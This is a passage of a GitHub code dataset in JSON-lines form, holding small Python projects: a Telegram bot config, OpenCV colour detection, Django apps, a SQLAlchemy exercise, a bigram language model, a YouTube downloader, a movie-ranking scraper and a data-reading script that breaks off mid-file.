+{"seq_id": "74265362329", "text": "import os\n\nfrom dotenv import load_dotenv\nfrom pathlib import Path\n\nload_dotenv(dotenv_path=Path(\".env\")) # Переменные (пароли, ИД) из файла .env\n\n\nADMINS = os.environ.get(\"ADMINS\").split(\",\")\nBOT_API_KEY = os.environ.get(\"BOT_API_KEY\")\n\nSHOW_FREE = \"Когда свободное время\"\nABOUT_MY = \"Обо мне\"\n\nSHOW_ALL = \"Показать все записи\"\nADD_GIRL = \"Добавить запись\"\nDELETE_GIRL = \"Удалить запись\"\nADD_ADMIN = \"Добавить администратора\"\n\nBUSY = \"Занята\"\nFREE = \"Свободная\"\n\nACCOUNT_TYPE_ADMIN = 1\nACCOUNT_TYPE_GIRL = 2\n\n# При указании * чтобы передавались только эти переменные\n__all__ = (\n \"ADMINS\",\n \"BOT_API_KEY\",\n \"SHOW_FREE\",\n \"SHOW_ALL\",\n \"ADD_GIRL\",\n \"DELETE_GIRL\",\n \"ADD_ADMIN\",\n \"BUSY\",\n \"FREE\",\n \"ACCOUNT_TYPE_ADMIN\",\n \"ACCOUNT_TYPE_GIRL\",\n)\n", "repo_name": "fier43/ManageBot", "sub_path": "bot/bot/constants.py", "file_name": "constants.py", "file_ext": "py", "file_size_in_byte": 954, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 6, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}]}
+{"seq_id": "24541430279", "text": "import cv2\r\nimport numpy as np\r\n\r\nOriginal = cv2.imread(\"original.png\")\r\nChanged = cv2.imread(\"change.png\")\r\n# specify colors boundaries\r\nP_lowerBoundary = [137, 73, 163]\r\nP_upperBoundary = [177, 113, 203]\r\n\r\nW_lowerBoundary = [220, 204, 182]\r\nW_upperBoundary = [255, 244, 222]\r\n\r\n# change data type to uint8 to be used with the bitwise_and function\r\nP_lowerBoundary = np.array(P_lowerBoundary, dtype = \"uint8\")\r\nP_upperBoundary = np.array(P_upperBoundary, dtype = \"uint8\")\r\n\r\nW_lowerBoundary = np.array(W_lowerBoundary, dtype = \"uint8\")\r\nW_upperBoundary = np.array(W_upperBoundary, dtype = \"uint8\")\r\n\r\n# Create Color Mask\r\nP_mask = cv2.inRange(Original, P_lowerBoundary, P_upperBoundary) \r\nW_mask = cv2.inRange(Original, W_lowerBoundary, W_upperBoundary)\r\n\r\n# Merge detected color with mask\r\nP_res = cv2.bitwise_and(Original, Original, mask = P_mask)\r\nW_res = cv2.bitwise_and(Original, Original, mask = W_mask)\r\n\r\ncv2.imshow('PINK', np.hstack([Original, P_res]))\r\ncv2.imshow('White', np.hstack([Original, W_res]))\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n", "repo_name": "NadaAbbasMohamed/ROV-Competition", "sub_path": "Task 1 - Color Detection Coral Reef Color Change/color detection_2.py", "file_name": "color detection_2.py", "file_ext": "py", "file_size_in_byte": 1059, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.imread", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "28145258082", "text": "import secrets\nimport string\nimport sys\n\ndef main(iters=20):\n try:\n rondas = int(iters)\n final = string.ascii_letters + string.punctuation.replace(\"\\'\", \"\").replace('\"', '')\n key = \"\"\n for i in range(rondas):\n key += secrets.choice(final)\n print(key)\n return key\n except Exception as e:\n raise ValueError(\"Second parameter must be a Integer.\")\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n if len(args) == 1:\n main(args[0])\n elif len(args) == 0:\n main()\n else:\n print(\"\\nGenerate random secure key.\")\n print(f'\\n. {sys.argv[0]} [string] [integer]\\n')\n print(\"Options:\\n1) String\\n2) Iterations - Integer\\n\")\n", "repo_name": "kurotom/littleKeysGenerator", "sub_path": "generateRandomKeys.py", "file_name": "generateRandomKeys.py", "file_ext": "py", "file_size_in_byte": 725, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "string.ascii_letters", "line_number": 8, "usage_type": "attribute"}, {"api_name": "string.punctuation.replace", "line_number": 8, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 8, "usage_type": "attribute"}, {"api_name": "secrets.choice", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 25, "usage_type": "attribute"}]}
+{"seq_id": "1257750606", "text": "from django.contrib.auth.models import User,Group\nfrom django import forms\nfrom basicinformation.models import *\nfrom basicinformation.tasks import *\nfrom .models import *\n\nclass CreateTimeTableForm(forms.ModelForm):\n class Meta:\n model = TimeTable\n fields = [\n 'date',\n 'timeStart',\n 'timeEnd',\n 'batch',\n 'sub',\n 'note',\n\n ]\n read_only_fields = ('created')\n", "repo_name": "prashantspandey/BodhiAI", "sub_path": "QuestionsAndPapers/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 456, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.forms.ModelForm", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}]}
+{"seq_id": "266789491", "text": "\nfrom collections import Counter\n\nwith open('2021/week_2/day_14/polymerinput.txt') as f:\n polyinputs = [f.strip() for f in f.readlines()]\n\ndef base_poly_and_pairs():\n poly = polyinputs[0]\n\n keys = [pair[0:2] for pair in polyinputs[2:]]\n vals = [pair[6] for pair in polyinputs[2:]]\n\n pairs = {keys[i]: vals[i] for i in range(len(keys))}\n\n return poly, pairs\n\npoly, pairs = base_poly_and_pairs()\n\ndef pair_insertion(steps, poly, pairs):\n for _ in range(steps):\n new_poly = []\n chunks = [poly[i:i+2] for i in range(len(poly)-1)]\n for c in chunks:\n if c in pairs.keys():\n new_poly += c[0] + pairs[c]\n\n new_poly.append(chunks[-1][1])\n poly = ''.join(new_poly)\n\n element_count = Counter(poly)\n return element_count.most_common()[0][1] - element_count.most_common()[-1][1]\n\nprint(pair_insertion(10, poly, pairs))\n\n\n\n\n\n", "repo_name": "JackIHill/AdventOfCode", "sub_path": "2021/week_2/day_14/day14_puzzles.py", "file_name": "day14_puzzles.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.Counter", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "40478173877", "text": "from django.db.models import Q\nfrom message_control.models import MatchEX\nfrom exchange_control.models import Exchange, SelectedEx\ndef setDone(instance):\n if instance.case_match != None:\n # add case\n user_case = Exchange.objects.get(id=instance.case_match.id)\n user_case.status = instance.status\n user_case.save()\n print(user_case.id, user_case.author.id)\n print(instance.id, instance.author.id)\n matching = MatchEX.objects.filter(\n Q(author=user_case.author.id, user=instance.author.id) | Q(author=instance.author.id, user=user_case.author.id)\n )\n print(matching)\n for m in matching:\n m.case_match.remove(instance)\n m.save()\n print('remove case')\n if instance.status == 'Wait':\n instance.case_match = None\n instance.save()\n user_case.case_match = None\n user_case.save()\n else:\n pass\n else:\n # select case\n selected = SelectedEx.objects.filter(caseEx=instance.id)\n print(selected)\n \n for i in selected:\n matching = MatchEX.objects.filter(\n Q(author=i.user.id, user=instance.author.id) | Q(author=instance.author.id, user=i.user.id)\n )\n print(matching)\n for m in matching:\n m.case_match.remove(instance)\n m.save()\n print('remove case')\n\n sel = SelectedEx.objects.get(id=i.id)\n sel.delete()\n print('delete')\n \n", "repo_name": "ChanakanD/deal", "sub_path": "exchange_control/setDone.py", "file_name": "setDone.py", "file_ext": "py", "file_size_in_byte": 1576, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "exchange_control.models.Exchange.objects.get", "line_number": 7, "usage_type": "call"}, {"api_name": "exchange_control.models.Exchange.objects", "line_number": 7, "usage_type": "attribute"}, {"api_name": "exchange_control.models.Exchange", "line_number": 7, "usage_type": "name"}, {"api_name": "message_control.models.MatchEX.objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "message_control.models.MatchEX.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "message_control.models.MatchEX", "line_number": 12, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 13, "usage_type": "call"}, {"api_name": "exchange_control.models.SelectedEx.objects.filter", "line_number": 29, "usage_type": "call"}, {"api_name": "exchange_control.models.SelectedEx.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "exchange_control.models.SelectedEx", "line_number": 29, "usage_type": "name"}, {"api_name": "message_control.models.MatchEX.objects.filter", "line_number": 33, "usage_type": "call"}, {"api_name": "message_control.models.MatchEX.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "message_control.models.MatchEX", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 34, "usage_type": "call"}, {"api_name": "exchange_control.models.SelectedEx.objects.get", "line_number": 42, "usage_type": "call"}, {"api_name": "exchange_control.models.SelectedEx.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "exchange_control.models.SelectedEx", "line_number": 42, "usage_type": "name"}]}
+{"seq_id": "34247988617", "text": "from sqlalchemy import create_engine, Column, String, Integer\nfrom sqlalchemy import select, func, and_, or_, between, union\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\n\nengine = create_engine(\"mysql+pymysql://elko:elko@10.10.64.201/elko\", echo = False)\n\nBase = declarative_base()\n\nclass City(Base):\n\n __tablename__= \"city\"\n\n #id\n id = Column(Integer, primary_key=True)\n # name\n name = Column(String(10))\n # age\n population = Column(Integer)\n\n\n\n def getName(self):\n return \"Wonderful \"+self.name\n\n def getPopulation(self):\n return self.population\n\n\nBase.metadata.create_all(engine)\n\nKyiv = City(id =1, name = \"Kyiv\", population = 3700000)\n\nsession = sessionmaker(engine)\nopen_session = session()\n\n#add info to table\n\n# open_session.add_all([\n# # City( name = \"Kyiv\", population = 3700000),\n# # City( name = \"Kharkiv\", population = 1400000)\n# City( name = \"Lviv\", population = 721000)\n# ])\nopen_session.commit()\n\n# print(Kyiv.getName())\n# print(Kyiv.getPopulation())\n\n#select all cities with their populations\n\ncities = open_session.query(City).all()\nfor city in cities:\n print(city.getName(), \"population is \", city.getPopulation())\n\n#select first element of table\n\nfirst_city = open_session.query(City).first()\nprint(first_city.name, \"is first city on DB\")\n\ncity_id = open_session.query(City).get(6)\nprint(\"Second city on DB is \", city_id.name)\n\n\n#update info (содержит ошибки)\n\n# lviv = open_session.query(City).get(7)\n# lviv.population = lviv.getPopulation()+20000\n#\n# open_session.commit()\n#\n# for lviv in open_session.query(City).all():\n# lviv.population = lviv.getPopulation()+20000\n#\n# open_session.commit()\n\n#select with filter\n\ncities = open_session.query(City).filter(and_(City.population>1000000, City.population<2000000))\nfor city in cities:\n print(city.population)\n\n\n#delete info from table\n\n# open_session.query(City).filter(and_(City.population>3000000)).delete()\n\n", "repo_name": "JohnKosten/lessons_py", "sub_path": "orm_classes.py", "file_name": "orm_classes.py", "file_ext": "py", "file_size_in_byte": 2010, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 7, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 16, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 20, "usage_type": "argument"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.and_", "line_number": 79, "usage_type": "call"}]}
+{"seq_id": "3411079387", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass BigramLanguageModel(nn.Module):\n def __init__(self, vocab_size):\n super().__init__()\n self.embedding = nn.Embedding(vocab_size, vocab_size)\n\n def forward(self, x, targets=None):\n # logits: b*t => b*t*c\n logits = self.embedding(x) \n\n if targets is not None:\n # cross-entropy for predicted distribution\n # (in this case, embedding layer actually represents trainable statistics\n # for next character prediction, i.e. each row is log p(x_i+1 | x_i))\n # and targets is essentially array of next tokens per each\n b, t, c = logits.shape\n logits = logits.view(b*t, c)\n targets = torch.flatten(targets)\n loss = F.cross_entropy(logits, targets)\n return logits, loss\n else:\n return logits, None\n \n def generate(self, idx, max_new_tokens):\n for _ in range(max_new_tokens):\n logits, _ = self(idx)\n # last logit in each batch\n logits = logits[:, -1, :]\n # turn logits into probability\n probs = F.softmax(logits, dim=1)\n # sample next token idx per batch\n idx_next = torch.multinomial(probs, num_samples=1)\n # concatenate predicted idx to sequence, repeat\n idx = torch.cat((idx, idx_next), dim=1) \n return idx\n", "repo_name": "shredder67/gpt-playground", "sub_path": "src/bigram_model.py", "file_name": "bigram_model.py", "file_ext": "py", "file_size_in_byte": 1456, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.flatten", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.multinomial", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 38, "usage_type": "call"}]}
+{"seq_id": "254450377", "text": "#!/usr/bin/env python3\n\nfrom pytube import YouTube\nfrom pytube.cli import on_progress\nfrom termcolor import colored\nimport re\nfrom youtube.files import remove_files\nfrom youtube.mpeg import merge_mp4_audio_and_video, convert_audio_to_mp3\nfrom youtube.format import shorten_name\nfrom urllib.error import HTTPError\nfrom random import randrange\nfrom time import sleep\n\n\nPROFILES = {\n 'progressive': {\n 'intro_message': 'file in highest available progressive resolution...',\n 'params': {\n 'progressive': True,\n 'file_extension': 'mp4'\n },\n 'order_by': 'resolution',\n 'out_message': 'Progressive MP4 file successfully downloaded!'\n },\n 'video': {\n 'intro_message': '.mp4 video file in highest available resolution...',\n 'params': {\n 'progressive': False,\n 'only_video': True,\n 'file_extension': 'mp4'\n },\n 'order_by': 'resolution',\n 'out_message': '.mp4 video file was successfully downloaded!'\n },\n 'audio': {\n 'intro_message': 'audio file in highest available bitrate...',\n 'params': {\n 'progressive': False,\n 'only_audio': True,\n 'file_extension': 'mp4'\n },\n 'order_by': 'abr',\n 'out_message': 'Audio track successfully downloaded...'\n }\n}\n\n\ndef get_filename(url: str):\n \"\"\"Validate if URL is ever exists and return output filename.\n\n Args:\n url (str): some YouTube URL\n\n Returns:\n [str] or [None]: output filename or None if URL is not correct\n \"\"\"\n try:\n yt = YouTube(url=url)\n title = re.sub(r'[^\\w\\s-]', '', yt.title) # remove all symbols\n title = re.sub(r'\\s+', ' ', title) # remove recurring spaces\n publish_date = yt.publish_date.strftime('%Y-%m-%d')\n slug = yt.video_id\n except HTTPError:\n print(colored(f'HTTP Error 404: url \"{url}\" not found!\\n', 'red'))\n return None\n except Exception as e:\n print(colored(f'Error: some unexpected error occured - \"{e}\"', 'red'))\n return None\n else:\n return f'{publish_date} - {title} [{slug}]'\n\n\ndef list_all_streams(url):\n return YouTube(url=url).streams\n\n\ndef list_streams(url: str, settings: dict):\n try:\n yt = YouTube(url=url).streams.\\\n filter(**settings['params']).\\\n order_by(settings['order_by']).\\\n desc()\n except Exception as err:\n print(f'Some error occured while listing streams: {err}')\n else:\n return list(yt) # 'list' here required to format output while print\n\n\ndef download(url: str, settings: dict, filename: str):\n try:\n yt = YouTube(url=url, on_progress_callback=on_progress).streams.\\\n filter(**settings['params']).\\\n order_by(settings['order_by']).\\\n desc().\\\n first()\n except Exception as error:\n print(f'Some error occured while downloading: {error}')\n else:\n print(\n colored(f'Downloading \"{shorten_name(yt.title)}\" '\n f'{settings[\"intro_message\"]}'))\n yt.download(filename=f'{filename}.mp4', skip_existing=False,\n timeout=10, max_retries=5)\n print(colored(f'\\n{settings[\"out_message\"]}', 'blue'))\n\n\ndef load_hq_video(url: str):\n # Get output filename\n filename = get_filename(url=url)\n\n # Break execution if 'filename' return None\n if filename is None:\n return\n\n # Remove old and temp files if exists, then download audio and video files\n remove_files('audio.mp4', 'video.mp4', f'{filename}.mp4')\n download(url=url, settings=PROFILES['audio'], filename='audio')\n download(url=url, settings=PROFILES['video'], filename='video')\n\n # Merge output and video files\n merge_mp4_audio_and_video(audio_file='audio', video_file='video',\n output_filename=filename)\n\n # Print summary message\n print(colored(f'Video was saved as \"{shorten_name(filename)}.mp4\"!',\n 'green'))\n\n # Remove temp files\n remove_files('audio.mp4', 'video.mp4')\n\n # Print empty line\n print()\n\n\ndef load_hq_audio(url: str):\n # Get output filename\n filename = get_filename(url=url)\n\n # Break execution if 'filename' return None\n if filename is None:\n return\n\n # Remove old and temp files if exists, then download mp4 audio file\n remove_files('audio.mp4', f'{filename}.mp3')\n download(url=url, settings=PROFILES['audio'], filename='audio')\n\n # Convert mp4 file into mp3 file\n convert_audio_to_mp3(audio_file='audio', output_filename=filename)\n\n # Print summary message\n print(colored(f'MP3 track was saved as \"{shorten_name(filename)}.mp3\"!',\n 'green'))\n\n # Remove temp file\n remove_files('audio.mp4')\n\n # Print empty line\n print()\n\n\ndef load_progressive(url: str):\n # Get output filename\n filename = get_filename(url=url)\n\n # Break execution if 'filename' return None\n if filename is None:\n return\n\n # Remove old file (not temp!) with the same name if it ever exist,\n # and download video in progressive format\n remove_files(f'{filename}.mp4')\n download(url=url, settings=PROFILES['progressive'], filename=filename)\n\n # Print summary message\n print(colored(f'Video was saved as \"{shorten_name(filename)}.mp4\"!',\n 'green'))\n\n # Print empty line\n print()\n\n\ndef make_pause(min: int, max: int):\n timeout = randrange(min, max)\n print(f'Making pause between requests for {timeout} seconds...\\n')\n sleep(timeout)\n\n\nif __name__ == \"__main__\":\n pass\n", "repo_name": "n8creator/youtube", "sub_path": "youtube/loader.py", "file_name": "loader.py", "file_ext": "py", "file_size_in_byte": 5636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pytube.YouTube", "line_number": 58, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 59, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 60, "usage_type": "call"}, {"api_name": "urllib.error.HTTPError", "line_number": 63, "usage_type": "name"}, {"api_name": "termcolor.colored", "line_number": 64, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 67, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 74, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 79, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 91, "usage_type": "call"}, {"api_name": "pytube.cli.on_progress", "line_number": 91, "usage_type": "name"}, {"api_name": "termcolor.colored", "line_number": 100, "usage_type": "call"}, {"api_name": "youtube.format.shorten_name", "line_number": 100, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 104, "usage_type": "call"}, {"api_name": "youtube.files.remove_files", "line_number": 116, "usage_type": "call"}, {"api_name": "youtube.mpeg.merge_mp4_audio_and_video", "line_number": 121, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 125, "usage_type": "call"}, {"api_name": "youtube.format.shorten_name", "line_number": 125, "usage_type": "call"}, {"api_name": "youtube.files.remove_files", "line_number": 129, "usage_type": "call"}, {"api_name": "youtube.files.remove_files", "line_number": 144, "usage_type": "call"}, {"api_name": "youtube.mpeg.convert_audio_to_mp3", "line_number": 148, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 151, "usage_type": "call"}, {"api_name": "youtube.format.shorten_name", "line_number": 151, "usage_type": "call"}, {"api_name": "youtube.files.remove_files", "line_number": 155, "usage_type": "call"}, {"api_name": "youtube.files.remove_files", "line_number": 171, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 175, "usage_type": "call"}, {"api_name": "youtube.format.shorten_name", "line_number": 175, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 183, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 185, "usage_type": "call"}]}
+{"seq_id": "47998429254", "text": "from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom bailout.views import index, data, links, member_search, financial_services_committee, switchers, no_no, yes_yes, register, user_login, user_dashboard, rating_page, user_logout, members_by_user_state, user_ratings, analyze, order_by_pac, explain_variables, members_of_congress_list, member_of_congress_detail\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nurlpatterns = [\n url(r'^$', index),\n url(r'^data$', data),\n url(r'^links$', links),\n url(r'^member_search$', member_search),\n url(r'^financial_services_committee$', financial_services_committee),\n url(r'^switchers$', switchers),\n url(r'^no_no$', no_no),\n url(r'^yes_yes$', yes_yes),\n url(r'^register$', register),\n url(r'^login/$', user_login),\n url(r'^logout/$', user_logout),\n url(r'^dashboard$', user_dashboard),\n url(r'^dashboard/(?P\\d+)$', rating_page), #change to r'^/rate/...\n url(r'^dashboard/(?P\\w+)$', members_by_user_state),\n url(r'^ratings/$', user_ratings),\n url(r'^analyze/$', analyze),\n url(r'^order_by_pac/$', order_by_pac),\n url(r'^explain_variables$', explain_variables),\n url(r'^members_of_congress/$', members_of_congress_list),\n url(r'^member_of_congress/(?P[\\w\\s]+)/$', member_of_congress_detail),\n\n\n\n # url(r'^members/$', members_of_congress_list),\n # url(r'^api/(?P[0-9]+)/$', member_of_congress_detail),\n\n # url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n", "repo_name": "joshuagendal/2008-Bank-Bailout-Data-Project", "sub_path": "bailout/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "bailout.views.index", "line_number": 7, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "bailout.views.data", "line_number": 8, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "bailout.views.links", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "bailout.views.member_search", "line_number": 10, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "bailout.views.financial_services_committee", "line_number": 11, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "bailout.views.switchers", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "bailout.views.no_no", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "bailout.views.yes_yes", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "bailout.views.register", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "bailout.views.user_login", "line_number": 16, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "bailout.views.user_logout", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "bailout.views.user_dashboard", "line_number": 18, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "bailout.views.rating_page", "line_number": 19, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "bailout.views.members_by_user_state", "line_number": 20, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "bailout.views.user_ratings", "line_number": 21, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "bailout.views.analyze", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "bailout.views.order_by_pac", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "bailout.views.explain_variables", "line_number": 24, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "bailout.views.members_of_congress_list", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "bailout.views.member_of_congress_detail", "line_number": 26, "usage_type": "argument"}, {"api_name": "rest_framework.urlpatterns.format_suffix_patterns", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "11458725479", "text": "from bs4 import BeautifulSoup\nimport requests\n\n\nheaders = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\ndata = requests.get('https://movie.naver.com/movie/sdb/rank/rmovie.nhn?sel=pnt&date=20190909',headers=headers)\n\nsoup = BeautifulSoup(data.text, 'html.parser')\n\n# select를 이용해서, tr들을 불러오기\nmovies = soup.select('#old_content > table > tbody > tr')\n\n# soup.select('input[type=\"checkbox\"]')\n\n# movies (tr들) 의 반복문을 돌리기\n\nnum = 0\nfor movie in movies:\n # movie 안에 a 가 있으면,\n\n a_tag = movie.select_one('td.title > div > a')\n rank = movie.select_one('td.point')\n\n if a_tag is not None:\n # a의 text를 찍어본다.\n num += 1\n # print(a, end=' ')\n print(num, a_tag.text, rank.text)\n\n\n\n", "repo_name": "hanrimJO/sparta", "sub_path": "crawling.py", "file_name": "crawling.py", "file_ext": "py", "file_size_in_byte": 855, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 8, "usage_type": "call"}]}
+{"seq_id": "6992209129", "text": "import os, os.path\nimport time, datetime\n# os.chdir(os.path.join(os.getcwd(),'src')) if os.path.basename(os.getcwd())!='src' else None\nimport pandas as pd\nimport numpy as np\nfrom src.utils.tools import db\nfrom src.projects.dima.tabletools import table_create, sql_command, tablecheck\nfrom src.projects.tall_tables.talltables_handler import ingesterv2\nfrom src.projects.dima.tabletools import table_create, tablecheck\nfrom src.projects.aero.aero_model import update_model\n\n\"\"\"\nX 1.read directory that holds outputs\nX 2.concatenate dataframe\nX 2.5 Plotid\n3.choose model_run_id / ModelRunKey\n- for now modelrun lookup + modeloutputs will be in dima db\n\n4. check if lookuptable exists +\n check if model run id exists +\n update modelrun lookup table with appropriate id\n4.update model_run + model run loookup table on postgres\n\"\"\"\n# p = r\"C:\\Users\\kbonefont\\Desktop\\aero_flux_2\"\n# df = txt_read(p)\n# df['Source'] = 'AIM'\n# df\n# table_create(df, \"aero_runs\", \"aero\")\ndef txt_read(path):\n df_dict = {}\n testset = [\"20184145384203B2_flux\",\"20184145384203B1_flux\",\"20184145374203B2_flux\"]\n count = 1\n for i in os.listdir(path):\n #if file is not an excelfile\n if os.path.splitext(i)[1]!=\".xlsx\":\n # debug block\n # if os.path.splitext(i)[0] in [i for i in testset]:\n # file = os.path.join(path,i)\n # created_time = os.path.getctime(file)\n # parsed_ctime = time.ctime(created_time)\n # 